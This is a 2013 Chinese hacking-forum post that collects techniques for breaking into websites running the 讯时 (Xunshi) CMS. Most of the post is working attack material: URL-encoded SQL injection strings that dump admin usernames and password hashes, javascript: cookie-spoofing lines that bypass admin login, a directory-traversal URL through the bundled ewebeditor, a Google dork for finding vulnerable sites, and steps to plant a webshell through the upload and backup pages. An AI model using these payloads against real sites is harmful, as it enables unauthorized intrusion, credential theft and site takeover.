找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2463|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
6 G! r% u5 q, s9 d0 M; L0 @  b& ]7 F7 G6 Z8 K* y* k) A8 ~
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新), Q# S4 p' ?% H
3 w  X. ]: K  E# A5 L3 R
以下本文总结来自黑防去年第9期杂志上的内容...
' N- e4 r! K% P, r+ |4 H3 }! w1 w' `& S/ s' Y$ M
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
- ]) E( U+ ]2 S$ P/ K
2 Y& ]0 _' D2 L: o26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 . a! L, y3 D/ Y. q

0 x0 G& ]6 I' X* a; h3 v% X% Y- I记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况7 s8 ?9 k* _! F& v3 ~4 ~. u
这里一个注入
* F' L+ M9 s2 ^
; W( p) b6 `8 D+ q" ?7 ]效果如图:$ O# ^! K0 U+ V4 t# m
  m  e% G# z5 p1 o' d' K5 j5 k
% B; o+ C+ q- h9 \
% |7 i0 F+ h6 @/ w8 q* P
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
2 H) N& u% @/ W2 o- p
& P9 p+ k  \& @$ [- G0 c3 P密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
) w. f( j3 b# C! ?( ?1 v: K; @
  s* C0 ?" O" {1 b9 xjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));8 b2 R& T1 k% y: z
# W( N/ e% e+ v# Q; z- f$ N
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:% t' e0 T6 B' i- {
" o/ x* F2 q. F* a1 V
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞* n  b2 U1 f0 `" M2 Z

% i7 ^6 p3 r' r$ x$ x5 k' ?! p它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
/ C$ o" W) J  D. b$ N
0 `; D$ r8 `- b8 A: d; q( J) w访问这页面来列目录..步骤如下:% K% b8 W( G6 W

! i% o' l2 ^2 x% M, Njavascript:alert(document.cookie="admindj=1") 4 S8 B$ T% j+ F- H1 q
! x: y  p) D: j* A" e0 B
http://www.political-security.co ... asp?id=46&dir=../../ I( a6 \# q5 [3 c. S9 @3 v

* H$ x. m+ [* N; _" a" Y; U* [7 w效果如图:5 \; z- l6 @* J* w% N9 m

+ @- B' q. k7 X* s
, Y6 a2 ]7 e, }! E! x5 G
, B5 ]* `* E2 P这样全站目录都能瞧了..找到后台目录..进去..5 b  n8 j8 F7 `- |; r9 Y
4 \2 {1 s/ V- P
那么进了后台怎么拿shell??上传--备份就ok了..7 X/ Z5 D' S% v+ W4 n0 G- O6 L+ T9 t
# F* t* r/ w& m! S: A
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..7 b# h) P* D  p; H# [& s6 X

1 ^! K7 V) ~- A: T; b( X0 {1 \$ Y- m这个我也碰到过一次..你都可以通过列目录来实现..; k4 T  ^+ F4 T, y$ Z
3 E" J1 L. a5 {4 q) M9 i! E; c
javascript:alert(document.cookie="admindj=1")
3 @& T/ `0 }* Q( v
: W0 [& V% S1 s! s0 s; phttp://www.political-security.co ... p?action=BackupData ; N+ k" L( s$ E2 N& Q5 B
' k2 o3 r! W) @4 o5 t: o. B% `
备份ok..1 o( z5 C( _2 J# |# w( x$ t
3 T+ [: a6 }7 S7 T
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?- @) y. B" l& Z0 P! O
+ o* v4 a' Q0 g3 x
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
0 q% E$ x" I+ D: m+ Q/ P& u  Z8 W" G% n- E! j
然后访问此页面进行注入..步骤如下:0 C* K1 x6 ?) R# l
2 b+ n" `% l: P4 `) U
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")5 t" \, p% d5 @7 X. \2 B! a$ L
% r9 j1 d- U+ M( ?. g4 [1 ?
然后请求admin/admin_chk.asp页面- [2 Y# l& w1 H8 N% x- |

* t, t" C% }7 @; _2 k输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%' R' v! G! i7 H

3 N. b9 j" v7 i9 a* I* C% [26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin/ S4 h9 v# f, z* Z' n! i+ g% _

' b( o% S. _7 }! t效果如图所示:
: e9 N0 a2 u9 I9 q! h* }! f5 _% f0 E" c3 g7 R1 A" h
( v) ]" k( N. W* `' ?! B+ Z

% f  H2 i' U# r6 T; N- Y1 n$ `讯时漏洞2+ m% T1 D1 d  |$ h8 L9 E
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
( `; G' r. F' Z5 M( J! P% n4 e " w+ x* z0 e9 C/ v( W
1、/admin/admin_news_pl_view.asp?id=1' K; E  q0 B3 B8 l5 _
//id任意 填入以下语句
! U- s1 }$ t- l6 l  U7 O, {8 q& `* K
5 X3 g5 O& R% v$ K2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!3 T/ \- h' d6 x8 M% y9 z4 B) p
: e4 r, T8 b7 N
! O6 Q1 l; P1 D& x# t  c- G2 ]

, M; |4 ?) S* k4 H, }; ~$ ^3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
: l/ c5 h) k% z: B9 A# h
1 \& X/ v  ?3 y/ P$ `; K4 `, X: o! j2 b$ ]: w/ q
% {* c  x- ]- W4 I; O4 Q
爆出管理员帐号和密码了6 W/ g4 w3 V! B+ G  L) |/ i8 S8 ?, P

' n3 p/ O. t8 @- t/ Q# N& I8 Y0 `2 H4 k( S1 R- Z2 {
5 ^: d& S1 S" Z$ \: l& [( E) g5 Z4 T
4、cookies进后台
" w# A3 ~' x9 V- r. R  o
3 L; j7 d5 @( _7 U1 h3 o, C' b- Xjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));& z4 o. I2 t8 L  i1 ?

5 T2 F5 n3 M9 {* O* _3 M; j3 {6 C6 k& z* Z( ]
' O" p7 v+ O" v" y& \- Y& ]- T
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
0 g$ I" W; X$ n0 L8 y1 B. T6 X1 F2 w + R4 T0 l5 L7 l

1 @& ~  E- [  Y  w6 a0 V2 P' L! `+ s8 Z5 F! x3 U) s: _$ T
6、后台有上传和备份取SHELL不难。
+ @' `4 B$ c& s7 r7 w 5 w; W! n) n9 e* @; M$ g9 f1 O
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..; o% z0 r, ]& h5 ~" i6 g

# D6 H3 R. x6 n- R* k逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
2 E7 O$ N  U* G& R) k+ ]" }" ^
5 z+ |8 e- Z, Z& t" Y  Q  j' R$ \7 O+ g9 _0 E1 K
- I- f% ^) e' B; f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表